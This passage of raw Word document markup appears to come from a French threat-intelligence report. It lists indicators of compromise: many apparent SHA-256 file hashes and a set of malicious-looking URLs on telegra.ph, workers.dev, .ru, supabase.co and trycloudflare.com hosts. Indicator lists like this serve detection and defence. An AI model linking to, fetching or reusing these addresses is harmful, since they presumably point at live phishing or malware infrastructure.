            <wp:wrapNone/>
            <wp:docPr id="3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1aa837b1017366b0fa38b25de83b4fd207898a5f058b87661e5b94d59c374c40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4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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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97361a91ba80981ca549ed19b2e2b9250fed6231027cd15418578b3db76b02ab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5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8015870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ac985354b7efd4356954c316c797e56ed88aa4651798bd79b5c7ebb353546a30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7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8192400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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afa005ad2707e4b6e1e565091c57ec5abdf45cd738bd1f1edfc04fcca1ad9c64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8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8368930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4fa6cc449144cab865cbf08823c2dbd65f9a78874e7fb673671243cebde12185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49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8545460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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443f7d8f68bad52c8eba786f96e56d7a515536be33a64fc7a504d89df36d4301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0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8721990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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435c462bf2cc6e85cf23a5e89a530d74ffeded42811584282e0028eb51656b3a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1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8898520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9caeceba523e8edf6c66dad74d637eb2a543665926198a8ec4bd2706ba2e5c93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2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9075050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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332414b948cd6d23138e32ca305a1d0bed77dfd3fd8cf740caa1d1d540130fef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3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9251580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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53415da748357289ce4a07ceaea79515d0c5af8488e9c00358399c043956e9d4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4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9428110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bd7237f92cc020ed71ae08a2eff01159900242164030c5c006191c4ca5322961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520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622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3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724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3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827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3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5929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3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56032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3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134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3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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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9ca63c6b5888bf4a2ba5ab4c6eae8d06cb995e725af56c832d80793bcee3fc32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3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942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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9b53a28d0435c3aaed88dcad1613be069c5b0a26e60be53e3288587a4954ccd6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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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62818ae5e305b89b9461536dac1b9daf4cebd99d24e417357e27e2ae4582a704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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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245a3b5790ff9bc88a9133d4e03f4fd8bec0e8d0ec7ad5baaecf4809a4bc14f2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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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d6b9448f1c2d0615c19ed9cb98a118bb862efd4a0de9a52e023c1d56b6a527eb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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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76adb34079bafcba8085ee5e776c971ec1b2a06b9a86ce4d05f5e9a2c8a2cd86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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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9106604572e0f4b2f46929ba3c63701be6db4b0ae109a2c4f9a39d9a88dd5cc9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69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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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229a2d142e425f747bf995360058ffef0cd854fbec935d2be1b10d1c889def86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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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873f4d4705b0532d4748ad8af54932020b2fe1071a3dc458b31b386b7df92da1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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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bfbb8ca8827dd73157eadcde062a0524fe68590478f06957285ff3c3ed732931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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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ffb013ed760720ecad2300561ae7c1f5bdfb6a7c77ff1d358ac0c1a0e040c186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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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d4cd014e94d33d776fef2d372157c69b6fe6e4bf7231e4259c6ea7808d9d6553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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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68d34e98f1824083cd9b7c72a9597a31d131a0f2f2baa767262f264001c99c04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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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56df5e14408f9266cd89c43b9464ea71b65cc1848f1b10fbdf8949776115f4c3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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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279e484dfb546e7ad84d5650572bb51d5180b431fdc8c0669e69e69d9a693bd5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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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af45888cdbff3927af6a28ca3a2a4e5e1fca209732761a9c2ba8b8c9b2c6b2bb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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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0a47d742555407201d0da7d6abca8d7d6a1dbcf28742687f4b835f17b69371e6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9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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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535a3e35ebaf4d26ed45cfb701250d00c078ba851f003d3104beb7940b8c7bb4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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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6e016724df082936cc98869b30134845ae6455e1b551e3fe421d2cdb7ed1dc66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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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0b4ca7afcbb02b0a3c7873752a8e4df9d4ce2fc8e56a223bef5f99c6ee277cc9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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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87c163c42f4328e71ec3f4997593751bd5b9d00e85a80e65c8e7312e3ab4bcc5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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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460621fff09cebcbd2ded09dd933ed66952d98c787548131136f3692d504fb44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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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08f7e1d85145fcd6bbc3787fee127876e0f47a1002d52b1bcc02ba1719dc87df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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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3ad10a3dfa76821fef436847fda698e061fa81ccd280f30edc82d036f7c621f3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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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dfd5247067a617e441c1cbabb8b9431030bf36405e80b2a72bf879ebedcaef84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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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4447722064bc617d342da4f9a26dd6a5d412cd7d9d9214340bf2c8782e6277f6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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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3dcc9bf0803af1560d56ebe0fa524b0d6bb2554022d0feeb8634d8b9dde0c607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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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e78a7fdd8c997fd21f5ffd91c8a670511f4494b41e4d8d72e8b20910f321bf78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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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1a438fd50762b104d3ef0aaddb94e30527773845974ec65efb95749d6d8f99bc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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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f7b5aa1b1a57c3e24b17dd0e85c900933a857212eee637b6c0020b280c9f4ad9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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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824100ecbbdea7a576d4c68b0815003d37b39c84e213320c296f609f53193d8f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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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6f83e020c07587aa71fdf20ee43c8643d37feeebab0dba839301b5597b0a87b3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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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c4546dcd30f7bf5397d7f4906da01db55990796ca4b79515f16090f3fe85005b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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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85eb88f01bd4de0d052c8109bc11baa7c1893e11002bea17bf7c18305dd9a8ea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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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c6afe1a912548fcec511af5efb2c66e4267f71b46f5b4802bf02271b34a3f49a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8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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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9a7053ce9d9959619f35ee58c0dcafc301dc3b29d00695a9d6aac26d3913f795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9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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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9df73f01233136268426aa5fa1c5f220f302db5ff2ab7739ca7fe60f600e751b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0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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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ddf34d901048ad25626d4a23965caeee2ccb0006f80baa2959de120e80ac1ebc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1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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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f58c4ce227f68f75df8eb7511a83c88a4837f8a19c5cda59fd0762e0480edadd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2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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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ae89c82b1620fc32ef720778a41e92965be412d3bfa6f62b7348e4f5463b6359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3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8015870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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d37d74e97f0d39c7f6703e4384af86ce4952693fac916c0a3d5b390a2fd00184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4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8192400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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c2a5aa9298b3fa2eaeaf92e297f0c8fde1f2bbb216ea40c961e544057c975352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5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8368930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4f15ca9dd66cc3d5a8dc89eefe92d445432e17aeea7cab9fb06f646a550a0149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6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8545460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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4d0384aa2bc171c97d3ea10e1802185157452dc1590d7368a089d74d844fb21c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7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8721990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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a6efbf9ea74fcc0fccbcc4d41104a6d602ee8d754f8d16e64fc9b17b0ce43e36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8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8898520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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5016e66fccfe9d7c255b616bbd7194e1de47cc750e274d2aa7485a98d798d174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09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9075050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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40357c6a326f5e669b304295941308b83af1b7bdedb3c636a7128d28befcf85e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0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9251580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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ecc6b07413cd515de1be8dd92ca4b7df808d4e118067e4617858ad5e48c40fbf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1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9428110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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eea39c6a3d7553e6a4151a37f9d28c6d6a883aac868f3a430c799b4a0de0e17c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254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4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356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4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45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4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561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664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61766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868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19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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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0c7a9137b494efc20050fcb0098d0ba536b9a4ac48329c808714eda168d7bdfa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0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942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ab9781dff29b1bf6170c9a71ca36657725b7af25eaf0ef18d2b1d344fa9e2a32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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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85d978f9b2b85b1bfa014e6ba5fc7e94f04f62f3f00cbee0187926e0090772b4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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2193d48e58732e26bf212e027fceda8974a9cedbb55281bd30550a28894aef2d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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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b7dbccad9a40c20194edcde7d1bc1724ec55d97be5882fb635395919539a9be4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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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c0b7a42bd52d3b21de66ce8437d9a068eacc3feb065202d32377690c9a80d580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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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86d9357bda4769036362832c039dbe800121ed9a966e8b59a3f9cccab61cdafb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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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580bfbdd7fad1d218b4cf0903c44c67c5f35617ced93d397e7b1397bbf9664fb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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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865795d330285efe0b178a1bbee3b2117ff7573dac60b09d899e0de6602b8e12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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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f2a31d145aa55a9d119f30884605df4e101a77e18c8fe30f2b1a1a75ff670169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29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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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f20a28ac0b62748a1562115a93e4d21d7bb3fd17fbe34dbb0d26fb73b3356b6e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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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b47d7cd9444cfd97f77d2d0be9bb33a15f44304a293df70a2905d8120b11f6ce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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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5ad055b7f80b2c0f0f11ec90d9b401dc5317cf23983e7c49f5eb3bb06f9d81d1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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2bef643f22532f907ea64f31663564e42697577d4a06f57399ecfce9aaf939a7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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4301fcede1fb8440f0ccefa09a4b2bd29757bde9e60dcfa1d27a5d9dbb5cbdbd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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2b7c52fda08833d5b65d75510d925c448403883376123f53e6c44788426979ca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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4942030fc49b6095097afae368a216e78f9c29d34d932ec6a6f25aa4370fe976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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1f8a3ec047e0f44f1f21e1e3f8af5ea32749ecac3e2bef4fc2ba1a2006934581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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9fc2a247313b078d795419b7d1c7c0cd907a103a4c64ebab6c96ddb7b958d230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9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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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aa572532ab1c8a731e7ba32e97ba180268eee8e6a74a2b9c4dc3efb669edb9af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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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acf6196228f25d0c9f172c7401b5f2c2ba1d30f847e5626678630458e7529c97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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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b789da8b71282678f5dc1a45ec65c02d646887cd365af2213b9cac76bae5b1a2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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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69cdde1ec82099a471283de89dd5e17266b1d8dda57d3c1589b7754b009fa2ed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3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5570878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="951335" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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133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IOC originaux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4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5845833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1246477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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Noms de domaine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5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6114680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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https://telegra.ph/mjwazl3ptx-05-14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6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6291210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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https://telegra.ph/9codWDi3Ru-05-16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7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6467740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://telegra.ph/O5Wv6FIfzx-07-22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8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6644270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://telegra.ph/u3wr87hdoq-08-08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49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6820800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2872720" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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7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https://te.legra.ph/ahwrctpggea-05-07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0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6997330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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http://domanuc.ru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1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7173860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2182463" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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24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https://6goa83.rubinovich.ru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2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7350390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://erwc.redheadedpu.ru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3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7526920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3332892" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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28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https://urf1e91.pzmxzjn7sb6ep9t.workers.dev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4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7703450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2642635" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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26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https://ikjqk.confirme.workers.dev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5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7879980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2949416" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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94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https://colb5.iuzhpkpd4sph.workers.dev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6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8056510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://o9f.addison8.workers.dev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7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8233040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://thesole.dpdns.org/mammet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8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8409570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2642635" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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26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https://bzpbvnhh.froml.workers.dev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59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8586100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2642635" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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26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https://alcg.7291merna.workers.dev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0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8762630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179502" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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950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https://kjlxojrz.tatianasolid.workers.dev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1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8939160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2949416" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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94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https://gohiz.griercrimson.workers.dev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2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9115690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2872720" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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7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https://agatd.acfsefcfvsd.workers.dev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3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9292220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3409588" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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958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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://documentation.ftjph87563.workers.dev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4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9468750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3102806" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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28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https://axbghxvgdglpgwfzaqih.supabase.co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57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4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681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4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78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4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886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4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988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4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67091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4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193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4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2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2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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576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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">http://open-files.sytes.net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3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712849" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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128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https://competitors-wrestling-equipped-meet.trycloudflare.com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5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3102806" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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28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https://busha80d.dp7uszdstai.workers.dev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6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1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://getdata.dpdns.org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7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2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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https://e742.gkzhu92787.workers.dev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8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2872720" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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7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https://cdypy.supplementa.workers.dev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79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2294913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="602180" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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1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0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2563760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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e9d61edc0a774cdd4e9c659a0058c1b0bc65c6e2c0d5c19da79319be65bfdd70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1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2740290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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db604f5fe5a289050db6449970a3670d75a5d8ec85a66e26c8af19ccc6cfd8cc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2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2916820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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0338b8c8b25956cc134628bcc7350d6102ca88e7777b3ca429cbd6ec88794f95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3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3093350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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15c145c42ff925381cb147a146c8957cff2dc96f27874252afa3b5e9838f9805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4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3269880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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8981723a6eaee69e4b042e98cea835fd166c9c5fa55b756d85ea4a43964de4bb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5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3446410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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6dfde3daa38c0bd21c12f0452f7433b1cd8a1c5cd075b54e79f705609e3192d4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6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3622940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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2ed97cc3d7d6eb702285b947992c5fd311a826afda78124674cae84ae49c6aee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7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3799470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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6b87b98ddae508ae4058867c4adb9ff1938cebbcdfe15c0135d63e5781bc6561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8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3976000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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eab1a24191c180b9bcb257285f153f9fb54c2c3a66ad844889008f6ee7d845d1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89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4152530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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d8febf042cc258c6bf5832a67178c8a943b3419de493dc2e8ed18f10750516a2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0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4329060</wp:posOffset>
